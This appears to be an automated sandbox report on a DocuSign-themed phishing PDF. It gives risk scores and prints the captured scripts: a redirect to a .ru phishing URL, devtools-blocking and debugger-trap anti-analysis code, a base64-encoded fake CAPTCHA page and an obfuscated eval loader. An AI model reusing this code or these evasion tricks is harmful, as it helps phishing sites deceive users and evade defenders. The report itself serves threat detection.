Windows Analysis Report
Dec 2024_12192924_Image.pdf

{
    "risk_score": 6,
    "reasoning": "The script includes a redirect to an unknown domain after a 3-second delay, which is a moderate-risk indicator. While the intent is not explicitly malicious, the use of an unfamiliar domain raises some concerns and requires further investigation."
}

        // Redirect after 3 seconds
        setTimeout(function() {
            window.location.href = "https://8g.tolirax.ru/3JCtG/"; // Replace with your target URL
        }, 3000); // 3000 milliseconds (3 seconds)
    

{
    "risk_score": 8,
    "reasoning": "This script demonstrates several high-risk behaviors, including detecting the presence of web automation tools, disabling common browser developer tools, and redirecting the user to an external website. The combination of these behaviors suggests a malicious intent to prevent analysis and potentially compromise the user's system."
}

if (navigator.webdriver || window.callPhantom || window._phantom || navigator.userAgent.includes("Burp")) {
        window.location = "about:blank";
}
document.addEventListener('keydown', function(event) {
    if (event.keyCode === 123) {
        event.preventDefault();
        return false;
    }

    if (
        (event.ctrlKey && event.keyCode === 85) ||
        (event.ctrlKey && event.shiftKey && event.keyCode === 73) ||
        (event.ctrlKey && event.shiftKey && event.keyCode === 67) ||
        (event.ctrlKey && event.shiftKey && event.keyCode === 74) ||
        (event.ctrlKey && event.shiftKey && event.keyCode === 75) ||
        (event.ctrlKey && event.keyCode === 72) ||
        (event.metaKey && event.altKey && event.keyCode === 73) ||
        (event.metaKey && event.altKey && event.keyCode === 67) ||
        (event.metaKey && event.keyCode === 85)
    ) {
        event.preventDefault();
        return false;
    }
});
document.addEventListener('contextmenu', function(event) {
    event.preventDefault();
    return false;
});
CxmdpNrTyv = false;
(function IwrTdBNajm() {
    let JpwaanxFEZ = false;
    const zqASsJFaBk = 100;
    setInterval(function() {
        const AoYBiPWbIW = performance.now();
        debugger;
        const xLuoUxSnCn = performance.now();
        if (xLuoUxSnCn - AoYBiPWbIW > zqASsJFaBk && !JpwaanxFEZ) {
            CxmdpNrTyv = true;
            JpwaanxFEZ = true;
            window.location.replace('https://translate.google.com');
        }
    }, 100);
})();

{
    "typosquatting": false,
    "unusual_query_string": false,
    "suspicious_tld": false,
    "ip_in_url": false,
    "long_subdomain": false,
    "malicious_keywords": false,
    "encoded_characters": false,
    "redirection": false,
    "contains_email_address": false,
    "known_domain": true,
    "brand_spoofing_attempt": false,
    "third_party_hosting": true
}

URL: https://purogosouls.github.io

{
    "risk_score": 7,
    "reasoning": "This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. While the script appears to have some legitimate functionality, such as loading jQuery and setting up a CAPTCHA-like interface, the presence of obfuscated code and interactions with untrusted domains raises significant security concerns. Further investigation is warranted to determine the true intent and potential impact of this script."
}

/* Don't be afraid to give up the good to go for the great. */
if(atob("aHR0cHM6Ly84Ry50b2xpcmF4LnJ1LzNKQ3RHLw==") == "nomatch"){
document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPG1ldGEgaHR0cC1lcXVpdj0iWC1VQS1Db21wYXRpYmxlIiBjb250ZW50PSJJRT1FZGdlLGNocm9tZT0xIj4NCiAgICA8bWV0YSBuYW1lPSJyb2JvdHMiIGNvbnRlbnQ9Im5vaW5kZXgsIG5vZm9sbG93Ij4NCiAgICA8bWV0YSBuYW1lPSJ2aWV3cG9ydCIgY29udGVudD0id2lkdGg9ZGV2aWNlLXdpZHRoLCBpbml0aWFsLXNjYWxlPTEuMCI+DQogICAgPHRpdGxlPiYjODIwMzs8L3RpdGxlPg0KPHN0eWxlPg0KYm9keSwgaHRtbCB7DQptYXJnaW46IDA7DQpwYWRkaW5nOiAwOw0KaGVpZ2h0OiAxMDAlOw0Kb3ZlcmZsb3c6IGhpZGRlbjsNCn0NCg0KLmJhY2tncm91bmQtY29udGFpbmVyIHsNCiAgICBwb3NpdGlvbjogcmVsYXRpdmU7DQogICAgaGVpZ2h0OiAxMDAlOw0KICAgIHdpZHRoOiAxMDAlOw0KfQ0KLmJhY2tncm91bmQtY29udGFpbmVyIC5iYWNrZ3JvdW5kIHsNCiAgICBjb250ZW50OiAiIjsNCiAgICBwb3NpdGlvbjogYWJzb2x1dGU7DQogICAgdG9wOiAwOw0KICAgIGxlZnQ6IDA7DQogICAgcmlnaHQ6IDA7DQogICAgYm90dG9tOiAwOw0KICAgIGJhY2tncm91bmQ6IHdoaXRlOw0KICAgIGJhY2tncm91bmQtc2l6ZTogY292ZXI7DQogICAgYmFja2dyb3VuZC1yZXBlYXQ6IG5vLXJlcGVhdDsNCiAgICBiYWNrZ3JvdW5kLXBvc2l0aW9uOiBjZW50ZXI7DQogICAgZmlsdGVyOiBibHVyKDVweCk7DQogICAgei1pbmRleDogLTE7DQp9DQouY29udGVudCB7DQogICAgcG9zaXRpb246IHJlbGF0aXZlOw0KICAgIHotaW5kZXg6IDE7DQogICAgZGlzcGxheTogZmxleDsNCiAgICBqdXN0aWZ5LWNvbnRlbnQ6IGNlbnRlcjsNCiAgICBhbGlnbi1pdGVtczogY2VudGVyOw0KICAgIGhlaWdodDogMTAwJTsNCiAgICBjb2xvcjogd2hpdGU7DQogICAgZm9udC1zaXplOiAyNHB4Ow0KICAgIHRleHQtYWxpZ246IGNlbnRlcjsNCn0NCi5jYXB0Y2hhLWJveCB7DQogICAgZGlzcGxheTogZmxleDsNCiAgICBiYWNrZ3JvdW5kOiAjMDAwMDAwOGE7DQogICAgZmxleC1kaXJlY3Rpb246IGNvbHVtbjsNCiAgICBhbGlnbi1pdGVtczogY2VudGVyOw0KICAgIGp1c3RpZnktY29udGVudDogc3BhY2UtYmV0d2VlbjsNCiAgICBib3JkZXI6IDFweCBzb2xpZCAjMGYwZTBlOw0KICAgIHBhZGRpbmc6IDIwcHggMTBweDsNCiAgICB3aWR0aDogMzAwcHg7DQogICAgbWFyZ2luOiAyMHB4IGF1dG87DQogICAgYm9yZGVyLXJhZGl1czogNHB4Ow0KICAgIGJveC1zaGFkb3c6IDBweCAycHggNHB4IHJnYmEoMCwgMCwgMCwgMC4yKTsNCiAgICBwb3NpdGlvbjogcmVsYXRpdmU7DQp9DQoNCi5jYXB0Y2hhLWNoZWNrYm94IHsNCiAgICBkaXNwbGF5OiBmbGV4Ow0KICAgIGhlaWdodDogMjBweDsNCiAgICBhbGlnbi1pdGVtczogY2VudGVyOw0KICAgIHBvc2l0aW9uOiByZWxhdGl2ZTsNCn0NCg0KLmNhcHRjaGEtY2hlY2tib3ggaW5wdXRbdHlwZT0iY2hlY2tib3giXSB7DQogICAgZGlzcGxheTogbm9uZTsNCn0NCg0KLmNhcHRjaGEtY2hlY2tib3ggbGFiZWwgew0KICAgIGRpc3BsYXk6IGZsZXg7DQogICAgYWxpZ24taXRlbXM6IGNlbnRlcjsNCiAgICBjdXJzb3I6IHBvaW50ZXI7DQp9DQoNCi5jYXB0Y2hhLWNoZWNrbWFyayB7DQogICAgd2lkdGg6IDIwcHg7DQogICAgaGVpZ2h0OiAyMHB4Ow0KICAgIGJvcmRlcjogMnB4IHNvbGlkICNkM2QzZDM7DQogICAgYm9yZGVyLXJhZGl1czogM3B4Ow0KICAgIGJhY2tncm91bmQtY29sb3I6ICNmZmY7DQogICAgLyogbWFyZ2luLXJpZ2h0OiAxMHB4OyAqLw0KICAgIHBvc2l0aW9uOiByZWxhdGl2ZTsNCn0NCg0KLmNhcHRjaGEtY2hlY2tib3ggaW5wdXRbdHlwZT0iY2hlY2tib3giXTpjaGVja2VkICsgbGFiZWwgLmNhcHRjaGEtY2hlY2ttYXJrOjphZnRlciB7DQogICAgY29udGVudDogIiI7DQogICAgcG9zaXRpb246IGFic29sdXRlOw0KICAgIGxlZnQ6IDVweDsNCiAgICB0b3A6IDFweDsNCiAgICB3aWR0aDogNnB4Ow0KICAgIGhlaWdodDogMTJweDsNCiAgICBib3JkZXI6IHNvbGlkICM0Y2FmNTA7DQogICAgYm9yZGVyLXdpZHRoOiAwIDNweCAzcHggMDsNCiAgICB0cmFuc2Zvcm06IHJvdGF0ZSg0NWRlZyk7DQp9DQoNCi5jYXB0Y2hhLXRleHQgew0KICAgIGZvbnQtZmFtaWx5OiBBcmlhbCwgc2Fucy1zZXJpZjsNCiAgICBmb250LXNpemU6IDE0cHg7DQogICAgbGVmdDogNnB4Ow0KICAgIGNvbG9yOiAjZmZmZmZmOw0KICAgIHBvc2l0aW9uOiByZWxhdGl2ZTsNCn0NCg0KLmNhcHRjaGEtbG9nbyBpbWcgew0KICAgIGhlaWdodDogNDBweDsNCiAgICB0b3A6IDBweDsNCiAgICByaWdodDogMDsNCiAgICBmbG9hdDogcmlnaHQ7DQogICAgcG9zaXRpb246IHJlbGF0aXZlOw0KfQ0KDQouY2FwdGNoYS1sb2FkZXIgew0KIGJhY2tncm91bmQtY29sb3I6I2Y5ZjlmOTsNCiBib3JkZXI6NnB4IHNvbGlkICM0ZDkwZmU7DQogYm9yZGVyLXJhZGl1czozNnB4Ow0KIGJvcmRlci1ib3R0b20tY29sb3I6dHJhbnNwYXJlbnQ7DQogYm9yZGVyLXJpZ2h0LWNvbG9yOnRyYW5zcGFyZW50Ow0KIGhlaWdodDozNnB4Ow0KIG91dGxpbmU6MDsNCiBwb3NpdGlvbjpyZWxhdGl2ZTsNCiAvKnJpZ2h0OiAxODJweDsqLw0KIHdpZHRoOjM2cHg7DQogYm94LXNpemluZzpib3JkZXItYm94Ow0KIGFuaW1hdGlvbjogc3BpbiBsaW5lYXIgMXMgaW5maW5pdGU7DQogZGlzcGxheTogbm9uZTsNCn0NCg0KQGtleWZyYW1lcyBzcGluIHsNCiAgICAwJSB7IHRyYW5zZm9ybTogcm90YXRlKDBkZWcpOyB9DQogICAgMTAwJSB7IHRyYW5zZm9ybTogcm90YXRlK

{
    "risk_score": 10,
    "reasoning": "This script demonstrates multiple high-risk behaviors, including dynamic code execution via the Proxy object and eval, potential data exfiltration, and obfuscated code. The combination of these factors indicates a high likelihood of malicious intent, warranting a maximum risk score of 10."
}

new Proxy({},{get:(_,n)=>eval([...n].map(n=>+("">n)).join``.replace(/.{8}/g,n=>String.fromCharCode(+("0b"+n))))}).

{
  "contains_trigger_text": true,
  "trigger_text": "You have a scanned document shared with you.",
  "prominent_button_name": "VIEW DOCUMENT",
  "text_input_field_labels": "unknown",
  "pdf_icon_visible": false,
  "has_visible_captcha": false,
  "has_urgent_text": false,
  "has_visible_qrcode": false,
  "contains_chinese_text": false,
  "contains_fake_security_alerts": false
}

{
  "contains_trigger_text": true,
  "trigger_text": "Click box pass",
  "prominent_button_name": "Click box pass",
  "text_input_field_labels": "unknown",
  "pdf_icon_visible": false,
  "has_visible_captcha": false,
  "has_urgent_text": false,
  "has_visible_qrcode": false,
  "contains_chinese_text": false,
  "contains_fake_security_alerts": false
}

{
  "brands": "unknown"
}

{
  "brands": [
    "DocuSign"
  ]
}